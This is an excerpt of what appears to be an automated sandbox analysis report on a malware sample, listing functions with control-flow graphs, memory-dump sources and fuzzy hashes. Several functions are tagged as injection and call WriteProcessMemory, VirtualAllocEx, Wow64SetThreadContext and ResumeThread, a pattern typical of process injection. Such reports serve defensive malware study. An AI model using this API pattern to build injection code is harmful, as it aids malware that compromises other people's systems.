                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 668ed08b98f49a4257715b198ac2c9343dbdd7f80009e73d6c3878056b9fccd4
                        • Instruction ID: e153690d528126986b643a06930ba6ac1b171b3cfe892f363640d13199eff5ad
                        • Opcode Fuzzy Hash: 668ed08b98f49a4257715b198ac2c9343dbdd7f80009e73d6c3878056b9fccd4
                        • Instruction Fuzzy Hash: 31316BF69046198FDB22DF94C544BEEBBF8AF88710F148459D455B7280C7356A44CBA0
                        Function 071E73E8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 245 71e73e8-71e743e 248 71e744e-71e748d WriteProcessMemory 245->248 249 71e7440-71e744c 245->249 251 71e748f-71e7495 248->251 252 71e7496-71e74c6 248->252 249->248 251->252
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E7480
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: d9a1ea1dad68c7fe767ea21d06889bc65091475ba5cae7104afae63a0ae3c83b
                        • Instruction ID: 179ab7df112f39bde8b6f296e1866285d0f2505a9ecd96705dd85a57b10d93d7
                        • Opcode Fuzzy Hash: d9a1ea1dad68c7fe767ea21d06889bc65091475ba5cae7104afae63a0ae3c83b
                        • Instruction Fuzzy Hash: 0E2148B59003599FDB10CFAAC881BDEBBF5FF48310F10842AE918A7280D7799554CFA5
                        Function 071E73F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 256 71e73f0-71e743e 258 71e744e-71e748d WriteProcessMemory 256->258 259 71e7440-71e744c 256->259 261 71e748f-71e7495 258->261 262 71e7496-71e74c6 258->262 259->258 261->262
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E7480
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: ab18c73866d20b46c4beb804082b37e112313a7bcaee557dc141ab2f12ca09ef
                        • Instruction ID: 06bfccba7034345a821f3a0ef3f1026f3be17a8131679ead5a8917872f467262
                        • Opcode Fuzzy Hash: ab18c73866d20b46c4beb804082b37e112313a7bcaee557dc141ab2f12ca09ef
                        • Instruction Fuzzy Hash: F02139B19003599FDF10CFAAC885BDEBBF5FF48310F10842AE918A7280D7789950CBA5
                        Function 071E6E18 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 266 71e6e18-71e6e6b 269 71e6e6d-71e6e79 266->269 270 71e6e7b-71e6eab Wow64SetThreadContext 266->270 269->270 272 71e6ead-71e6eb3 270->272 273 71e6eb4-71e6ee4 270->273 272->273
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E6E9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 84464d64a9c55b2355972cc1be36e9a39f0a68487ebc8359cfd40875a4cdf665
                        • Instruction ID: ffbc734cff303b32a97b80758cf6def609a14bea14aff9b0b0cb44e4f626f78b
                        • Opcode Fuzzy Hash: 84464d64a9c55b2355972cc1be36e9a39f0a68487ebc8359cfd40875a4cdf665
                        • Instruction Fuzzy Hash: 6A2159B19003099FDB10CFAAC4857EEBBF4AF48324F14842AD459A7280C779A945CFA5
                        Function 071E74D8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 277 71e74d8-71e756d ReadProcessMemory 281 71e756f-71e7575 277->281 282 71e7576-71e75a6 277->282 281->282
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E7560
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 57eafb837f543d7750452a3c0567e53dc352321642f58d2a780081587b9d622b
                        • Instruction ID: 84c29c9b5638cdf3386d2f745422a83ac30d29679bce74cd0fb2d85528d9ca09
                        • Opcode Fuzzy Hash: 57eafb837f543d7750452a3c0567e53dc352321642f58d2a780081587b9d622b
                        • Instruction Fuzzy Hash: 572139B18003599FDB10CFAAC841BEEFBF5FF48310F10882AE958A7680C7799540CBA5
                        Function 02E1AFD4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 286 2e1afd4-2e1d65c DuplicateHandle 288 2e1d665-2e1d682 286->288 289 2e1d65e-2e1d664 286->289 289->288
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E1D58E,?,?,?,?,?), ref: 02E1D64F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: b2fa8a56ac0784b8f4e62929e74f7d5967df0cb4087e17339de950f69dbc34b0
                        • Instruction ID: 6d14f897ef94128458dfddb2c8139fd1bd110bd3bc1e792ae4ac5d1b4aad54b1
                        • Opcode Fuzzy Hash: b2fa8a56ac0784b8f4e62929e74f7d5967df0cb4087e17339de950f69dbc34b0
                        • Instruction Fuzzy Hash: 2621E6B5900248DFDB10CFAAD884ADEBFF5FB48324F14846AE918A7350D374A950CFA5
                        Function 071E6E20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 292 71e6e20-71e6e6b 294 71e6e6d-71e6e79 292->294 295 71e6e7b-71e6eab Wow64SetThreadContext 292->295 294->295 297 71e6ead-71e6eb3 295->297 298 71e6eb4-71e6ee4 295->298 297->298
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E6E9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 04e1e2a9f6057347ae320dfe709c7f9d18e9dca34ba77d95734fd1e263bafa03
                        • Instruction ID: e546a9d93ef35aa7f325da90a1f29c9d4199dee77128276190ec9d2906151fe6
                        • Opcode Fuzzy Hash: 04e1e2a9f6057347ae320dfe709c7f9d18e9dca34ba77d95734fd1e263bafa03
                        • Instruction Fuzzy Hash: A72135B19003098FDB10DFAAC4857EEBBF4AF48324F54842AD419A7280C779A984CFA4
                        Function 071E74E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 71e74e0-71e756d ReadProcessMemory 305 71e756f-71e7575 302->305 306 71e7576-71e75a6 302->306 305->306
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E7560
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 12801bcde533ef117a7f9c4adcd44305822b05be6d4c91dfcd0ca11dca45bcb0
                        • Instruction ID: 788f29ea85ed1a77c7e71b3ba79a9d622eb1d758c5f259712a2d33ec36a5e222
                        • Opcode Fuzzy Hash: 12801bcde533ef117a7f9c4adcd44305822b05be6d4c91dfcd0ca11dca45bcb0
                        • Instruction Fuzzy Hash: BA2116B18003499FDB10DFAAC840BEEBBF5FF48310F10842AE519A7280C7799540CBA4
                        Function 02E1D5C1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 310 2e1d5c1-2e1d65c DuplicateHandle 311 2e1d665-2e1d682 310->311 312 2e1d65e-2e1d664 310->312 312->311
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E1D58E,?,?,?,?,?), ref: 02E1D64F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 57a0c935c7e48d280396f1f80fe0b0f3c5232d44d4f6092a88438e5c712e04ab
                        • Instruction ID: 64711c08fc63bf98f7562f76aeca3b1006a318371c63e986840eb711c9b3b02c
                        • Opcode Fuzzy Hash: 57a0c935c7e48d280396f1f80fe0b0f3c5232d44d4f6092a88438e5c712e04ab
                        • Instruction Fuzzy Hash: F821E4B69002099FDB10CFA9D985BDEBBF4FB48314F14841AE958A3350D378A950CF64
                        Function 071E7329 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 315 71e7329-71e73ab VirtualAllocEx 318 71e73ad-71e73b3 315->318 319 71e73b4-71e73d9 315->319 318->319
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E739E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 4dc04ecbcb8a0bb35780a49ec6c5ae809091e2ae1796e41693f0d9f2bc3b698b
                        • Instruction ID: b1d9fb88a44878bc01e7a587b70f1fc573dd118159957ed7f1077dca50c1d7db
                        • Opcode Fuzzy Hash: 4dc04ecbcb8a0bb35780a49ec6c5ae809091e2ae1796e41693f0d9f2bc3b698b
                        • Instruction Fuzzy Hash: B81159B29002499FDF10DFAAC844BEFBBF5AF88310F14841AE515A7290C7759550CFA1
                        Function 071E7330 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E739E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: bbc4f8179271386a96acc6e32ccee5ef8f012bd6f1822754979fa0b2366da041
                        • Instruction ID: 496d54e5c8943d4c4a9f31a346a6e5f1d04429b6ae7f91526e533f8efe9216f2
                        • Opcode Fuzzy Hash: bbc4f8179271386a96acc6e32ccee5ef8f012bd6f1822754979fa0b2366da041
                        • Instruction Fuzzy Hash: C51137728003499FDB10DFAAC845BEFBBF5EF48320F148419E915A7290C775A950CFA4
                        Function 02E1ADA0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02E1B104), ref: 02E1B33E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: be0bf0f329a1d7aa1ec48d31df72cb078da65be7bbc46186b3810d63e650ef1b
                        • Instruction ID: e36bbcd4630d2beadbb4054826ab6e8fae67ec23210b3580c9587d553147414d
                        • Opcode Fuzzy Hash: be0bf0f329a1d7aa1ec48d31df72cb078da65be7bbc46186b3810d63e650ef1b
                        • Instruction Fuzzy Hash: EB1102B6D002498FDB10CF9AC444BDEFBF4EB48228F10846ED819A7200C3B5A545CFA5
                        Function 071E6D70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 165fb6241d8d1e43f55f91f8ecce884f805a9346b21686eddaca099cfd0f6efa
                        • Instruction ID: 8b99e40f8f23028b918dd9168ac7a05653c3716afb064812636e7ee6bdf221e2
                        • Opcode Fuzzy Hash: 165fb6241d8d1e43f55f91f8ecce884f805a9346b21686eddaca099cfd0f6efa
                        • Instruction Fuzzy Hash: 9B1128B19043488FDB10DFAAC8457DFFBF5AF48224F14841AD559A7240C775A540CBA5
                        Function 071E6D68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 6771d3fcdc24b6d4e39eaeaa9c9596e4b1b6ba2a03386b88b7646df18f444748
                        • Instruction ID: 8c33c342bf2e3c32230680336cd09cb0cbc7bc66fe2062dc0b23532189a6fc93
                        • Opcode Fuzzy Hash: 6771d3fcdc24b6d4e39eaeaa9c9596e4b1b6ba2a03386b88b7646df18f444748
                        • Instruction Fuzzy Hash: ED1158B58003488FDB21DFAAC8447EFBBF5AF48320F24841AD559A7280C779A544CFA5
                        Function 071EB958 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071EB9BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 6773aa79ede4c00299212f9b36b52e6c60b71027a368876a99958cc82c259842
                        • Instruction ID: 199d04aa0882f437231b15eb9d5f2f27e044eb0b2efac86d6c76cef262b33df9
                        • Opcode Fuzzy Hash: 6773aa79ede4c00299212f9b36b52e6c60b71027a368876a99958cc82c259842
                        • Instruction Fuzzy Hash: 501113B58043499FDB22CF9AD885BDEBBF8FB48320F10841AE954A7240C375A554CFA1
                        Function 071E6148 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071EB9BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: cec1b1b20ebe9dee610b916a18f5f12dd8436020f6c6e73e932e8e7b47a1c291
                        • Instruction ID: a8f4d3e364bf3566501c549a2978c51a752b7808740e87d39c4898e2bd8c94d4
                        • Opcode Fuzzy Hash: cec1b1b20ebe9dee610b916a18f5f12dd8436020f6c6e73e932e8e7b47a1c291
                        • Instruction Fuzzy Hash: 6611F5B58047499FDB20DF9AC485BDEBBF8EB48320F10841AE554A7240C375A944CFA5
                        Function 0141D4C4 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68ab927fbc22ab4dc4b37f63eb3ffe7bb1c9df03a6c8db99f46dca0e295af362
                        • Instruction ID: d2b60be1d03df821f0c4725d0a1f639adb654b7ae4ef1caa4ca67db15214ecd2
                        • Opcode Fuzzy Hash: 68ab927fbc22ab4dc4b37f63eb3ffe7bb1c9df03a6c8db99f46dca0e295af362
                        • Instruction Fuzzy Hash: 1B2128B1904244EFDB15DF54D9C4B27BFA5FB88318F20C56AE8090B26AC336D456CAA2
                        Function 0141D3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf576665e04ea159761909def8b5aa6e0dd71c3edea3f7d824ed9c56aa0a16e9
                        • Instruction ID: 533ca995488ea1223471ba4f9f76dd09019db5a5fdcde17a5966d81e483a244f
                        • Opcode Fuzzy Hash: cf576665e04ea159761909def8b5aa6e0dd71c3edea3f7d824ed9c56aa0a16e9
                        • Instruction Fuzzy Hash: 312138B1944204DFDB05DF54D9C4B57BB65FB84324F20C17AE8090B26AC336E446CAA2
                        Function 0142D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4751670a09c9964e8d8b315518800d89a5b9f82a284763235fca5b8410fba638
                        • Instruction ID: 8d029052f3e2c99528c11205ae821597963403af71d77342c94a71cf2fa458e9
                        • Opcode Fuzzy Hash: 4751670a09c9964e8d8b315518800d89a5b9f82a284763235fca5b8410fba638
                        • Instruction Fuzzy Hash: DC212671904304EFEB15DF94D9C0B26BBA5FB85324F60C5AEE8494B362C736D486CA71
                        Function 0142D01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4a9d11b11d4c61c40013d5cf26059336d105eebbbcf55239a18d984f532ba00
                        • Instruction ID: 396f094669c2685099100389e4a88263d3149513cd8354d5bc6796680aec5b58
                        • Opcode Fuzzy Hash: d4a9d11b11d4c61c40013d5cf26059336d105eebbbcf55239a18d984f532ba00
                        • Instruction Fuzzy Hash: 652125B1904344DFDB15DF54D880B16BBA1FB84318F60C56EE94A4B376C33AD487CA61
                        Function 0142D006 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0f1bd2134898bb187b122b91fbf1f2400009dad3d952e48addc8fc40474ec72
                        • Instruction ID: f64b480ec7a5167518c4f16de3dbd0b8c4d8a2f57f117a0a5732a95ce9b2545c
                        • Opcode Fuzzy Hash: a0f1bd2134898bb187b122b91fbf1f2400009dad3d952e48addc8fc40474ec72
                        • Instruction Fuzzy Hash: 0E2180755093808FDB13CF24D594716BF71EB46218F28C5EBD8498F6A7C33A984ACB62
                        Function 0141D3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                        • Instruction ID: b665fba7bb3f4970c9488e9e8f88bf03cf8112789a6486d5f887f1ba07036e4b
                        • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                        • Instruction Fuzzy Hash: 2811D2B2844240CFDB16CF44D5C4B56BF71FB84314F24C6AAD8090B26BC33AD456CB91
                        Function 0141D4BF Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                        • Instruction ID: 4e8bbf04f5f3691d35eb18849870e6cf39e4a07cee48ac8b0e40cab9ec30e1b9
                        • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                        • Instruction Fuzzy Hash: A911B1B6904280CFDB16CF54D9C4B16BF72FB84318F24C6AAD8490B66BC336D456CBA1
                        Function 0142D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600757653.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_142d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                        • Instruction ID: 9ddfdd9bd6bf59983c176141cc79e5cc3fbca076f24571f0add1768a04148cf4
                        • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                        • Instruction Fuzzy Hash: C211BB75904280DFDB12CF54C5C4B16BBA2FB85224F24C6AAD8494B3A6C33AD44ACB61
                        Function 0141D745 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9153ca0515fe0df197e5410c3446fb94a90a4056a18f54ff342b0d46bdfe340
                        • Instruction ID: 2c0009123326ebb92c7cf18d3099fc039b5b23dc06b44e5e6e7f284ac5b023ea
                        • Opcode Fuzzy Hash: e9153ca0515fe0df197e5410c3446fb94a90a4056a18f54ff342b0d46bdfe340
                        • Instruction Fuzzy Hash: E9012BB14043849FF7205E65CC88B67FBD8EF41234F08C52BED280A29BD3799441CAB6
                        Function 0141D744 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1600692785.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_141d000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de3b6ea32455d89d9d27ea77bba5a7f7f10e491d6461e8f082b8fdf81ba99f05
                        • Instruction ID: 5a09586f8522436969697837f6a605c7c80c55815ffaafa00613ff50d4ed6ac7
                        • Opcode Fuzzy Hash: de3b6ea32455d89d9d27ea77bba5a7f7f10e491d6461e8f082b8fdf81ba99f05
                        • Instruction Fuzzy Hash: 98F062754043849FE7219E1AC888B67FFD8EF81634F18C45AED584A297C379A844DBB1

                        Non-executed Functions

                        Function 071ED108 Relevance: .4, Instructions: 380COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9761bb1c159190e7542cb0d2b0ad6050b09b8262b93e1bc9fef793f3f6277260
                        • Instruction ID: 8ed98d21480a9aea1e31db9c93a36af66005114a10198944e8d756aecd279cbc
                        • Opcode Fuzzy Hash: 9761bb1c159190e7542cb0d2b0ad6050b09b8262b93e1bc9fef793f3f6277260
                        • Instruction Fuzzy Hash: 8BD16BB1701B018FDB2ADB75D850BAEB7FBAF89600F148469D1869B7D0CB35E901CB91
                        Function 071E6EF8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 517b547f81fae2f9bfc9ab54a8405f1c88cff6b450de789f52f4a84b14fe75a0
                        • Instruction ID: d61c1704693be91a76d2284e80f2044b84640c81894faa789d965dc639b8cafe
                        • Opcode Fuzzy Hash: 517b547f81fae2f9bfc9ab54a8405f1c88cff6b450de789f52f4a84b14fe75a0
                        • Instruction Fuzzy Hash: 7DE12DB4E006198FDB14DFA8D5909AEFBF6FF89304F24816AD814AB395D731A941CF60
                        Function 071E4D48 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a410d71f58d41c00220d8116c60e5b1f95645194b99f69dc19a23518af04c02e
                        • Instruction ID: abfe50fb7fc6593202b566d05c5c84dfe62bc60ab028ace8609530098451c664
                        • Opcode Fuzzy Hash: a410d71f58d41c00220d8116c60e5b1f95645194b99f69dc19a23518af04c02e
                        • Instruction Fuzzy Hash: 61E12EB4E006598FDB14DFA8C590AAEFBF6FF89304F24816AD814AB355D7319941CF60
                        Function 071E44D8 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
